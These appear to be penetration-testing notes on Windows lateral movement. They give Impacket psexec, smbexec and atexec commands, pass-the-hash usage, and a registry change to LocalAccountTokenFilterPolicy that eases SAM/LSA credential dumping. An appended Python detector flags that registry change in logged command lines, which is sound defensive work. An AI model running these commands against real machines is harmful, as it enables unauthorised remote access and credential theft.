Requires admin privileges on the local machine. If it works, you get an NT AUTHORITY\SYSTEM shell. The shell is obtained over SMB, so if SMB is not open on the target machine, this is not usable.

impacket-psexec "$user:$pass@$target"

smbexec is useful when the target machine does NOT have a writable share available.

impacket-smbexec "$user:$pass@$target"

atexec uses the Task Scheduler service to execute commands.

impacket-atexec "$user:$pass@$target"

Pass the hash

impacket-psexec "$user@$target" -hashes ":$hash"

The same works for impacket-atexec and impacket-smbexec.

LocalAccountTokenFilterPolicy

Use this on a machine that does not allow remote control; it will allow us to get a shell via SMB on that machine.

Usually I use this to dump SAM/LSA more easily with impacket-secretsdump.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 0x1 /f
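
From the defender's side, this registry change is worth alerting on. The added example below (not part of the original notes) flags process-creation command lines in which reg add sets LocalAccountTokenFilterPolicy to non-zero data. The sample command lines are constructed and the function names are hypothetical.

```python
import re

# Constructed sample command lines, as recorded by process-creation logging
# (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled).
SAMPLE_CMDLINES = [
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 0x1 /f',
    r'"C:\Windows\System32\reg.exe" ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v localaccounttokenfilterpolicy /t REG_DWORD /d 1 /f',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 0 /f',
    r'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f',
]
POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"
VALUE_NAME = "localaccounttokenfilterpolicy"

def _switch(cmdline, name):
    """Argument that follows a reg.exe switch such as /v or /d, unquoted."""
    m = re.search(r'(?i)(?:^|\s)/%s\s+(?:"([^"]*)"|(\S+))' % name, cmdline)
    return (m.group(1) if m.group(1) is not None else m.group(2)) if m else None

def _dword(text):
    """Parse reg.exe DWORD data given as decimal or 0x-prefixed hex."""
    try:
        return int(text, 16) if text.lower().startswith("0x") else int(text, 10)
    except ValueError:
        return None

def enables_policy(cmdline):
    """True if a 'reg add' command line sets the value to non-zero data."""
    low = cmdline.lower()
    if not re.search(r'\breg(\.exe)?"?\s+add\b', low) or POLICY_KEY not in low:
        return False
    value, data = _switch(cmdline, "v"), _switch(cmdline, "d")
    if value is None or data is None or value.lower() != VALUE_NAME:
        return False
    # Assumption: any non-zero data is worth flagging; 1 is the documented value.
    return bool(_dword(data))

def find_policy_changes(cmdlines):
    """Indexes of the command lines that enable the policy."""
    return [i for i, c in enumerate(cmdlines) if enables_policy(c)]

if __name__ == "__main__":
    for i in find_policy_changes(SAMPLE_CMDLINES):
        print("ALERT:", SAMPLE_CMDLINES[i])
```

Setting the value back to 0 (the third sample line) restores the default filtering and is deliberately not flagged.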